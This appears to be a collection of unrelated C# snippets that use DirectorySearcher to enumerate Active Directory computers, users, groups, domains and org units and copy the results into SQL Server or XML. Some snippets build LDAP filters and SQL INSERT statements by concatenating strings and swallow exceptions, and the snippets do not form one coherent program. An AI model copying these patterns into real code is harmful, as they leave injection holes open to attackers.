private List <string> GetDomainComputers() { if (Config.TargetDc != null) { DomainControllers.Add(Config.TargetDc); } else { GetDomainControllers(); } var domainComputers = new List <string>(); // we do this so if the first one fails we keep trying til we find a DC we can talk to. foreach (var domainController in DomainControllers) { try { // TODO add support for user defined creds here. using (var entry = new DirectoryEntry("LDAP://" + domainController)) { using (var mySearcher = new DirectorySearcher(entry)) { mySearcher.Filter = ("(objectClass=computer)"); // No size limit, reads all objects mySearcher.SizeLimit = 0; // Read data in pages of 250 objects. Make sure this value is below the limit configured in your AD domain (if there is a limit) mySearcher.PageSize = 250; // Let searcher know which properties are going to be used, and only load those mySearcher.PropertiesToLoad.Add("name"); mySearcher.PropertiesToLoad.Add("dNSHostName"); mySearcher.PropertiesToLoad.Add("lastLogonTimeStamp"); foreach (SearchResult resEnt in mySearcher.FindAll()) { // TODO figure out how to compare timestamp //if (resEnt.Properties["lastLogonTimeStamp"]) //{ // continue; //} // Note: Properties can contain multiple values. if (resEnt.Properties["dNSHostName"].Count > 0) { var computerName = (string)resEnt.Properties["dNSHostName"][0]; domainComputers.Add(computerName); } } } } return(domainComputers); } catch (Exception e) { Config.Mq.Trace(e.ToString()); throw; } } return(null); }
private void FindChildrenDomains() { DirectoryEntry rootDse = new DirectoryEntry(string.Format("LDAP://{0}/RootDSE", dName), dc.UserName, dc.Password); string configureName = rootDse.DirContext.ConfigurationNamingContext; if (configureName == null || configureName == "") { return; } DirectoryEntry sys = new DirectoryEntry(string.Format("LDAP://{0}/CN=Partitions,{1}", SDSUtils.DNToDomainName(configureName), configureName), dc.UserName, dc.Password); DirectorySearcher ds = new DirectorySearcher(sys); ds.Filter = "(objectClass=crossRef)"; ds.SearchScope = SearchScope.OneLevel; SearchResultCollection src = ds.FindAll(); if (src != null && src.Count > 0) { foreach (SearchResult sr in src) { string sProtocol, sServer, sCNs, sDCs; SDSUtils.CrackPath(sr.Path, out sProtocol, out sServer, out sCNs, out sDCs); DirectoryEntry partEntry = new DirectoryEntry(sr.Path, dc.UserName, dc.Password); string parentDomainDN = partEntry.Properties["trustParent"].Value as string; if (parentDomainDN != null && parentDomainDN != "" && dName.Equals(SDSUtils.DNToDomainName(parentDomainDN), StringComparison.InvariantCultureIgnoreCase)) { children.Add(new Domain(SDSUtils.DNToDomainName(partEntry.Properties["nCName"].Value as string))); } } } return; }
public void ReinstailizeAD_Table() { DirectoryEntry entry = new DirectoryEntry(@"LDAP://ad.asdfasdf.com"); // :636 DirectorySearcher mySearcher = new DirectorySearcher(entry); mySearcher.PageSize = 6000; entry.Username = "******"; entry.Password = "******"; SearchResultCollection results; mySearcher.Filter = "(&(objectClass=user)(objectCategory=person)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"; mySearcher.PropertiesToLoad.Add("telephonenumber"); mySearcher.PropertiesToLoad.Add("department"); mySearcher.PropertiesToLoad.Add("displayname"); mySearcher.PropertiesToLoad.Add("objectguid"); mySearcher.PropertiesToLoad.Add("mail"); mySearcher.PropertiesToLoad.Add("company"); mySearcher.PropertiesToLoad.Add("mailnickname"); mySearcher.PropertiesToLoad.Add("samaccountname"); mySearcher.PropertiesToLoad.Add("title"); // string queryGuid1 = "50d50b492f1dfc4c9fe1b239258bf9c7"; results = mySearcher.FindAll(); int i = 0; // OleDbConnection dbconn = new OleDbConnection("Provider=Microsoft.Jet.OLEDB.4.0;data source=" + Server.MapPath("GK_AD_LIST.mdb")); // dbconn.Open(); // OleDbCommand dbcomm = new OleDbCommand("select * from gk_adlist", dbconn); string truncatetable = @"truncate table gk_adlist"; SqlCommand mytruncomm = new SqlCommand(truncatetable, Appconnection()); mytruncomm.ExecuteNonQuery(); string insertvalue = @"insert into gk_adlist (quid,displayname,emailadd,company,department,phonenumber,samaccountname,title) values ("; string department = ""; string displayname = ""; string objectguid = ""; string mail = ""; string company = ""; string telephonenumber = ""; string queryGuid = ""; string samaccountname = ""; string title = ""; foreach (SearchResult resEnt in results) { { ResultPropertyCollection propcoll = resEnt.Properties; i++; foreach (string key in propcoll.PropertyNames) { try { if (key.ToString().Trim().ToLower() == "objectguid") { foreach (byte b in (System.Byte[])resEnt.Properties[key][0]) { queryGuid += b.ToString("x2"); } } else { } if (key.ToString().Trim().ToLower() == "telephonenumber") { telephonenumber = resEnt.Properties[key][0].ToString().Trim(); } if (key.ToString().Trim().ToLower() == "department") { department = replacebadcharacters(resEnt.Properties[key][0].ToString().Trim()); } if (key.ToString().Trim().ToLower() == "displayname") { displayname = replacebadcharacters(resEnt.Properties[key][0].ToString().Trim()); } if (key.ToString().Trim().ToLower() == "mail") { mail = replacebadcharacters(resEnt.Properties[key][0].ToString().Trim()); } if (key.ToString().Trim().ToLower() == "samaccountname") { samaccountname = replacebadcharacters(resEnt.Properties[key][0].ToString().Trim()); } if (key.ToString().Trim().ToLower() == "title") { title = replacebadcharacters(resEnt.Properties[key][0].ToString().Trim()); } if (key.ToString().Trim().ToLower() == "company") { company = replacebadcharacters(replacebadcharacters(resEnt.Properties[key][0].ToString().Trim())); } // Response.Write(key.Trim() + "=" + resEnt.Properties[key][0].ToString().Trim()); } catch (Exception ee) { // Response.Write(ee.Message.ToString()); } } insertvalue += "'" + queryGuid + "','" + displayname + "','" + mail + "','" + company + "','" + department + "','" + telephonenumber + "','" + samaccountname + "','" + title + "')"; SqlCommand dbcom = new SqlCommand(insertvalue, Appconnection()); try { string test; if (displayname.Trim().Length > 0 && mail.Trim().Length > 0) dbcom.ExecuteNonQuery(); dbcom.Connection.Close(); test = "4"; } catch (Exception ex) { } // Response.Write("<br />"); insertvalue = "insert into gk_adlist (quid,displayname,emailadd,company,department,phonenumber,samaccountname, title) values ("; department = ""; displayname = ""; objectguid = ""; mail = ""; company = ""; telephonenumber = ""; queryGuid = ""; } } // dbconn.Close(); }
public Dictionary<string, DirectoryEntry> GetAllMembers(DirectoryEntry deTop, ProviderMemberFilter filter, int maxResultSetSize,BackgroundWorker bw) { // map SIDs to AD user object Dictionary<string, DirectoryEntry> adUserGroupMap = new Dictionary<string, DirectoryEntry>(); int count = 0; string filterString = ""; string objecttype = ""; // yep, let's get the default cell data first if (filter == ProviderMemberFilter.AllUserGroupMembersOnly) { if (groupScope == null || groupScope == string.Empty) { filterString = "(|(objectClass=user)(objectClass=group))"; //"(|(&(objectClass=user)(uidNumber=*))(&(objectClass=group)(gidNumber=*)))"; } else { filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" + "(&(objectClass=group)(grouptype=-2147483646))(&(objectClass=group)(grouptype=2))" + "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4))(objectClass=user))"; } objecttype = "usergroup"; } else if (filter == ProviderMemberFilter.GroupMembersOnly) { if (groupScope == null || groupScope == string.Empty) filterString = "(objectClass=group)";// "(&(objectClass=group)(gidNumber=*))"; else if (groupScope == "-2147483644" || groupScope == "4") filterString = "(|(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4)))"; else if (groupScope == "-2147483640" || groupScope == "8") filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" + "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4)))"; else if (groupScope == "-2147483646" || groupScope == "2") filterString = "(objectClass=group)"; objecttype = "group"; } else if (filter == ProviderMemberFilter.LocalGroupsOnly) { filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" + "(&(objectClass=group)(grouptype=-2147483646))(&(objectClass=group)(grouptype=2))" + "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4)))"; objecttype = "group"; } else if (filter == ProviderMemberFilter.UserMembersOnly) { filterString = "(objectClass=user)";//"(&(objectClass=user)(uidNumber=*))"; objecttype = "user"; } else if (filter == ProviderMemberFilter.AllMembers) { if (groupScope == null || groupScope == string.Empty) { filterString = "(|(objectClass=user)(objectClass=group)(objectClass=computer))";//"(|(&(objectClass=user)(uidNumber=*))(&(objectClass=group)(gidNumber=*)))"; } else { if (groupScope == "-2147483644" || groupScope == "4") { filterString = "(|(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4))(objectClass=user))"; } else if (groupScope == "-2147483640" || groupScope == "8") { filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" + "(&(objectClass=group)(grouptype=-2147483644))(&(objectClass=group)(grouptype=4))(objectClass=user))"; } else if (groupScope == "-2147483646" || groupScope == "2") { filterString = "(|(objectClass=user)(objectClass=group))"; } else if (groupScope == "-2147483643") { filterString = "(|(&(objectClass=group)(grouptype=-2147483640))(&(objectClass=group)(grouptype=8))" + "(&(objectClass=group)(grouptype=-2147483646))(&(objectClass=group)(grouptype=2))(objectClass=user))"; } } objecttype = "domainusergroup"; } else if (filter == ProviderMemberFilter.AllUserComputerMembersOnly) { filterString = "(|(objectClass=user)(objectClass=computer))"; } DirectorySearcher dsT = new DirectorySearcher(deTop, filterString); dsT.SearchScope = SearchScope.Subtree; dsT.PageSize = SEARCHER_PAGE_SIZE; SearchResultCollection src = null; try { src = dsT.FindAll(); foreach (SearchResult sr in src) { if (count == maxResultSetSize) return adUserGroupMap; DirectoryEntry o = new DirectoryEntry(sr.Path); if (filter == ProviderMemberFilter.AllMembers) { if (o != null && (o.SchemaClassName.Equals("user") || (o.SchemaClassName.Equals("group")) || (o.SchemaClassName.Equals("computer")))) { adUserGroupMap.Add(o.Properties["distinguishedName"].Value as string, o); count++; } } else if (filter == ProviderMemberFilter.AllUserComputerMembersOnly) { if (o != null && (o.SchemaClassName.Equals("user") || (o.SchemaClassName.Equals("computer")))) { adUserGroupMap.Add(o.Properties["distinguishedName"].Value as string, o); count++; } } else if (filter == ProviderMemberFilter.AllUserGroupMembersOnly) { if (o != null && (o.SchemaClassName.Equals("user") || (o.SchemaClassName.Equals("group")))) { adUserGroupMap.Add(o.Properties["distinguishedName"].Value as string, o); count++; } } else { if (o != null && o.SchemaClassName.Equals(objecttype)) { adUserGroupMap.Add(o.Properties["distinguishedName"].Value as string, o); count++; } } } } catch (Exception aex) { bw.ReportProgress(percentDone, (Object)aex); } finally { src.Dispose(); } return adUserGroupMap; }
public List <ADOrgUnit> ReadOrgUnits() { List <ADOrgUnit> orgUnits = new List <ADOrgUnit>(); using (DirectoryEntry startingPoint = new DirectoryEntry(Properties.Settings.Default.ADUrl)) { using (DirectorySearcher searcher = new DirectorySearcher(startingPoint)) { searcher.PageSize = 500; searcher.Filter = "(objectCategory=organizationalUnit)"; searcher.PropertiesToLoad.Add("objectGUID"); searcher.PropertiesToLoad.Add("name"); searcher.PropertiesToLoad.Add("ou"); searcher.PropertiesToLoad.Add(Properties.Settings.Default.OrgUnitNameField); searcher.PropertiesToLoad.Add("distinguishedname"); using (var resultSet = searcher.FindAll()) { foreach (SearchResult res in resultSet) { Guid uuid = new Guid((byte[])res.Properties["objectGUID"][0]); string dn = (string)res.Properties["distinguishedname"][0]; string name; if (res.Properties.Contains(Properties.Settings.Default.OrgUnitNameField)) { name = (string)res.Properties[Properties.Settings.Default.OrgUnitNameField][0]; } else if (res.Properties.Contains("name")) { name = (string)res.Properties["name"][0]; } else { name = (string)res.Properties["ou"][0]; } var parent = res.GetDirectoryEntry()?.Parent; bool skip = false; foreach (string ouToIgnore in ousToIgnore) { if (ouToIgnore.Trim().Length == 0) { continue; } if (dn.ToLower().EndsWith(ouToIgnore.ToLower())) { skip = true; } } if (skip) { continue; } ADOrgUnit ou = new ADOrgUnit(); ou.Uuid = uuid.ToString().ToLower(); ou.Name = name; ou.Dn = dn; if (parent?.Guid != null) { ou.ParentUUID = parent.Guid.ToString().ToLower(); } orgUnits.Add(ou); } } } } return(orgUnits); }
public Hashtable GetUserInfo(string userName, string path) { DirectorySearcher search = new DirectorySearcher(path); SSAErrorLog logObj = new SSAErrorLog(); logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "get user info 1"); search.Filter = "(&(objectClass=user)(cn=" + userName + "))"; logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "get user info 2" + userName); // search.Filter = "(&(objectClass=user)(samaccountname=" + userName + "))"; //search.Filter = "(cn=" + _filterAttribute + ")"; SearchResultCollection sResults = null; string colStr = ""; Hashtable getData = null; try { getData = new Hashtable(); sResults = search.FindAll(); logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "get user info 2" + sResults.Count); //loop through results of search foreach (SearchResult searchResult in sResults) { logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "searching propss...1 "); int propCount = searchResult.Properties.Count; ICollection coll = searchResult.Properties.PropertyNames; //ResultPropertyValueCollection valueCollection = // searchResult.Properties["lastlogontimestamp"]; //ResultPropertyValueCollection passwordExpired = // searchResult.Properties["userAccountControl"]; //ResultPropertyValueCollection passwordchanged = // searchResult.Properties["whenchanged"]; //ResultPropertyValueCollection passwordexpires = // searchResult.Properties["accountexpires"]; //ResultPropertyValueCollection whencreated = // searchResult.Properties["whencreated"]; //ResultPropertyValueCollection lockouttime = // searchResult.Properties["lockouttime"]; ResultPropertyValueCollection principalname = searchResult.Properties["name"]; //ResultPropertyValueCollection emailid = // searchResult.Properties["mail"]; logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "searching propss...2 "); ResultPropertyValueCollection mobileno = searchResult.Properties["mobile"]; logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "searching propss...3 " + "mobileno obj " + mobileno); //int m_Val1 = (int)searchResult.Properties[""]..Properties["userAccountControl"]..Value; //int m_Val1 = Int32.Parse(passwordExpired[0].ToString()); //int m_Val2 = (int)0x10000; //bool m_Check = false; //if (Convert.ToBoolean(m_Val1 & m_Val2)) //{ // m_Check = true; //} //end //if (m_Check) // getData.Add("passwordexpired", "Expired"); //else // getData.Add("passwordexpired", "Not Expired"); //getData.Add("lastlogontimestamp", DateTime.FromFileTime((long)valueCollection[0]).ToLongDateString()); //getData.Add("whencreated", whencreated[0].ToString()); //if (lockouttime[0].ToString().Equals("0")) //{ // getData.Add("lockouttime", "Active, Not Locked"); //} //else // getData.Add("lockouttime", "Not Active, Locked"); //getData.Add("pwdlastchanged", passwordchanged[0].ToString()); getData.Add("principalname", principalname[0].ToString()); // getData.Add("emailid", emailid[0].ToString()); // logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "mobileno count ?? " + mobileno.Count); if (mobileno != null) { if (mobileno.Count > 0) { // logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "mobileno count ?? " + mobileno.Count); //logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "mobileno[0].ToString() " + mobileno[0].ToString()); getData.Add("mobileno", mobileno[0].ToString()); } } else { logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "no mobileno () "); } } } catch (Exception ex) { logObj.ErrorLog(ConfigurationManager.AppSettings["logfilepath"].ToString(), "get user info excep" + ex.Message); throw new Exception("Error obtaining group names. " + ex.Message); } return(getData); }
private static SearchResultCollection RetrieveAllNetworkUsersFromLDAP(string sDomainName) { string sServerName = System.Configuration.ConfigurationManager.AppSettings[sDomainName].ToString(); string sLDAPPath = "LDAP://" + sServerName + "/DC=" + sDomainName + ",DC=root01,DC=org"; DirectoryEntry objRootDE = new DirectoryEntry(sLDAPPath, sUID, sPwd, AuthenticationTypes.Secure); DirectorySearcher objDS = new DirectorySearcher(objRootDE); objDS.Filter = "(|(&(objectClass=User)(givenname=*)(sn=*)))"; objDS.ReferralChasing = ReferralChasingOption.None; objDS.PropertiesToLoad.Add("userAccountControl"); objDS.PropertiesToLoad.Add("SAMAccountName"); SearchResultCollection objSRC = null; try { objSRC = objDS.FindAll(); } catch (Exception excpt) { if (excpt.Message.IndexOf("The server is not operational.") < 0) throw; } objDS.Dispose(); objRootDE.Close(); objRootDE.Dispose(); return objSRC; }
static void Main() { DirectoryEntry objADAM; // Binding object. DirectoryEntry objGroupEntry; // Group Results. DirectorySearcher objSearchADAM; // Search object. SearchResultCollection objSearchResults; // Results collection. string strPath; // Binding path. // Construct the binding string. strPath = "LDAP://localhost:389/OU=TestOU,O=Fabrikam,C=US"; Console.WriteLine("Bind to: {0}", strPath); Console.WriteLine("Enum: Groups and members."); // Get the AD LDS object. try { objADAM = new DirectoryEntry(strPath); objADAM.RefreshCache(); } catch (Exception e) { Console.WriteLine("Error: Bind failed."); Console.WriteLine(" {0}", e.Message); return; } // Get search object, specify filter and scope, // perform search. try { objSearchADAM = new DirectorySearcher(objADAM); objSearchADAM.Filter = "(&(objectClass=group))"; objSearchADAM.SearchScope = SearchScope.Subtree; objSearchResults = objSearchADAM.FindAll(); } catch (Exception e) { Console.WriteLine("Error: Search failed."); Console.WriteLine(" {0}", e.Message); return; } // Enumerate groups and members. try { if (objSearchResults.Count != 0) { foreach (SearchResult objResult in objSearchResults) { objGroupEntry = objResult.GetDirectoryEntry(); Console.WriteLine("Group {0}", objGroupEntry.Name); foreach (object objMember in objGroupEntry.Properties["member"]) { Console.WriteLine(" Member: {0}", objMember.ToString()); } } } else { Console.WriteLine("Results: No groups found."); } } catch (Exception e) { Console.WriteLine("Error: Enumerate failed."); Console.WriteLine(" {0}", e.Message); return; } Console.WriteLine("Success: Enumeration complete."); return; }
protected void btnClick_Click(object sender, EventArgs e) { DirectoryEntry myDirectoryEntry = new DirectoryEntry(String.Format("LDAP://{0}", "Progressive.com")); DirectorySearcher mySearcher = new DirectorySearcher(myDirectoryEntry); mySearcher.Filter = ("(objectCategory=person)"); foreach (SearchResult result in mySearcher.FindAll()) { try { if (!String.IsNullOrEmpty(result.Properties["Mail"][0].ToString()) && System.Text.RegularExpressions.Regex.IsMatch(result.Properties["DisplayName"][0].ToString(), " |admin|test|service|system|[$]", System.Text.RegularExpressions.RegexOptions.IgnoreCase) ) { //int space = resEnt.Properties["DisplayName"][0].ToString().IndexOf(" "); //string formattedName = String.Format("{0}{1}{2}", // resEnt.Properties["DisplayName"][0].ToString().Substring(space).PadRight(25), // resEnt.Properties["DisplayName"][0].ToString().Substring(0, space).PadRight(15), // resEnt.Properties["Mail"][0].ToString() // ); //userList.Add(formattedName); string SAMAccountName = Convert.ToBoolean(result.Properties["sAMAccountName"].Count > 0) ? result.Properties["sAMAccountName"][0].ToString() : ""; string DisplayName = Convert.ToBoolean(result.Properties["displayName"].Count > 0) ? result.Properties["displayName"][0].ToString() : ""; string mail = Convert.ToBoolean(result.Properties["mail"].Count > 0) ? result.Properties["mail"][0].ToString() : ""; string company = Convert.ToBoolean(result.Properties["company"].Count > 0) ? result.Properties["company"][0].ToString() : ""; string department = Convert.ToBoolean(result.Properties["UserFlags"].Count > 0) ? result.Properties["UserFlags"][0].ToString() : ""; Response.Write(SAMAccountName); Response.Write(" "); Response.Write(DisplayName); Response.Write(" "); Response.Write(mail); Response.Write(" "); Response.Write(company); Response.Write(" "); Response.Write(department); Response.Write("<br>"); } } catch { } } //if (userList.Count > 0) //{ // for (int i = 0; i < userList.Count - 1; i++) // { // Response.Write((userList[i].ToString())); // Response.Write("<br>"); // } //} }
public static void clr_GetADobjects(SqlString ADpath, SqlString ADfilter, out SqlXml MemberList) { // Filter syntax: https://msdn.microsoft.com/en-us/library/aa746475(v=vs.85).aspx // AD attributes: https://msdn.microsoft.com/en-us/library/ms675089(v=vs.85).aspx MemberList = new SqlXml(); //System.IO.StreamWriter file = Util.CreateLogFile(); SearchResultCollection results = null; Int32 itemcount = 0; try { XmlDocument doc = new XmlDocument(); XmlDeclaration xmlDeclaration = doc.CreateXmlDeclaration("1.0", "UTF-8", null); XmlElement root = doc.DocumentElement; doc.InsertBefore(xmlDeclaration, root); XmlElement body = doc.CreateElement(string.Empty, "body", string.Empty); doc.AppendChild(body); ADcolsTable TblData = new ADcolsTable((string)ADfilter); DataTable tbl = TblData.CreateTable(); DataRow row; // Create key/value collection - key is (user) distinguishedname, value is object GUID. Dictionary<string, Guid> UserDStoGUID = new Dictionary<string, Guid>(); DirectoryEntry entry = new DirectoryEntry((string)ADpath); DirectorySearcher searcher = new DirectorySearcher(entry); searcher.Filter = (string)ADfilter; searcher.PageSize = 500; results = searcher.FindAll(); foreach (SearchResult searchResult in results) { itemcount++; DirectoryEntry item = searchResult.GetDirectoryEntry(); row = tbl.NewRow(); UACflags Item_UAC_flags = null; Int64 UserPasswordExpiryTimeComputed = 0; PropertyValueCollection ADGroupType = null; for (int i = 0; i < TblData.collist.Length; i++) { TableColDef coldef = TblData.collist[i]; switch(coldef.OPtype) { case "Adprop": if (coldef.ADpropName == "useraccountcontrol" && Item_UAC_flags != null) { row[i] = Item_UAC_flags.ADobj_flags; break; } PropertyValueCollection prop = Util.GetADproperty(item, coldef.ADpropName); if (prop != null) row[i] = prop.Value; break; case "UAC": if (Item_UAC_flags == null) { // Get UAC flags only once per AD object. Item_UAC_flags = new UACflags(Util.Get_userAccountControl(item, out UserPasswordExpiryTimeComputed)); } row[i] = Item_UAC_flags.GetFlag(coldef.ADpropName); break; case "ObjClass": row[i] = item.SchemaClassName; break; case "ObjGuid": row[i] = item.Guid; break; case "filetime": Int64 time = 0; if (coldef.ADpropName == "msDS-UserPasswordExpiryTimeComputed") time = UserPasswordExpiryTimeComputed; else time = Util.GetFileTime(searchResult, coldef.ADpropName); if(time > 0 && time != 0x7fffffffffffffff && time != -1) { //row[i] = DateTime.FromFileTimeUtc(time); row[i] = DateTime.FromFileTime(time); // Convert UTC to local time. } break; case "SID": row[i] = Util.GetSID(item, coldef.ADpropName); break; case "GrpCat": if (ADGroupType == null) ADGroupType = Util.GetADproperty(item, "grouptype"); row[i] = Util.GetGroupCategory(ADGroupType); break; case "GrpScope": if (ADGroupType == null) ADGroupType = Util.GetADproperty(item, "grouptype"); row[i] = Util.GetGroupScope(ADGroupType); break; } } tbl.Rows.Add(row); if (TblData.IsUser) { // Set UserMustChangePasswordAtNextLogon column value (for user objects). bool IsUsrChgPwd = false; if (row.IsNull("PasswordLastSet") && !row.IsNull("PasswordNeverExpires") && !row.IsNull("PasswordNotRequired") && !(bool)row["PasswordNeverExpires"] && !(bool)row["PasswordNotRequired"]) { IsUsrChgPwd = true; } row["UserMustChangePasswordAtNextLogon"] = IsUsrChgPwd; // Collect user distinguishedname into dictionary, value is object GUID. // This is needed later to set ManagerGUID column. UserDStoGUID.Add((string)row["distinguishedname"], (Guid)row["ObjectGUID"]); } // Save group members into the Xml document. if (TblData.IsGroup && item.Properties.Contains("member")) { PropertyValueCollection coll = Util.GetADproperty(item, "member"); string parent = (string)row["distinguishedname"]; Util.SaveGroupMembersToXml(doc, body, parent, coll); } } // endof: foreach (SearchResult searchResult in results) // All rows have been added to the dataset. // set ManagerGUID column for user objects. if (TblData.IsUser) { foreach (DataRow rowUsr in tbl.Rows) { object manager = rowUsr["Manager"]; // distinguishedname of Manager. if (manager == DBNull.Value) continue; Guid ManagerGUID; if (UserDStoGUID.TryGetValue((string)manager, out ManagerGUID)) rowUsr["ManagerGUID"] = ManagerGUID; } } // Return dataset to SQL server. ReturnDatasetToSqlServer(tbl); using (XmlNodeReader xnr = new XmlNodeReader(doc)) { MemberList = new SqlXml(xnr); } } catch (System.Runtime.InteropServices.COMException) { SqlContext.Pipe.Send("COMException in clr_GetADobjects. ItemCounter = " + itemcount.ToString()); throw; } catch (InvalidOperationException) { SqlContext.Pipe.Send("InvalidOperationException in clr_GetADobjects. ItemCounter = " + itemcount.ToString()); throw; } catch (NotSupportedException) { SqlContext.Pipe.Send("NotSupportedException in clr_GetADobjects. ItemCounter = " + itemcount.ToString()); throw; } catch (Exception) { SqlContext.Pipe.Send("Exception in clr_GetADobjects. ItemCounter = " + itemcount.ToString()); throw; } finally { if (null != results) { results.Dispose(); // To prevent memory leaks, always call results = null; // SearchResultCollection.Dispose() manually. } } //file.Close(); }